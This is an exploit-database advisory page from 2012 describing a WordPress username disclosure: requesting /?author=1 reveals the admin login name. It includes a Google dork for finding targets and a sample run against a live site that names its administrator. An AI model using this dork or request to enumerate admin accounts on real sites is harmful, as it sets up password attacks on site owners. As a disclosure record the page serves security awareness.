Wordpress Admin name Information Disclosure

2012.09.19
Credit: PistqoN
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: Wordpress All Version Wp-Admin Username Vulnerability # Google Dork: inurl:/?author=1 # Date: 17/09/12 # Exploit Author: PistqoN # E-Mail: Pistqon@hotmail.com # Software Link: http://wordpress.org/download/ # Version: All # Tested on: Linux Ubuntu - Windows 7 - Windows Xp # Video: https://vimeo.com/49694640 # Exploit work on [+] http://localhost/wordpress/?author=1 [+] Title: Wordpress - admin > http://localhost/wordpress/wp-login.php > Username (admin) # Online Test [+] http://www.wordpress.org/?author=1 [+] Title: Wordpress - Matt Mullenweg > http://www.wordpress.org/wp-login.php > Username (Matt Mullenweg)

References:

http://wordpress.org/download/
https://vimeo.com/49694640


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top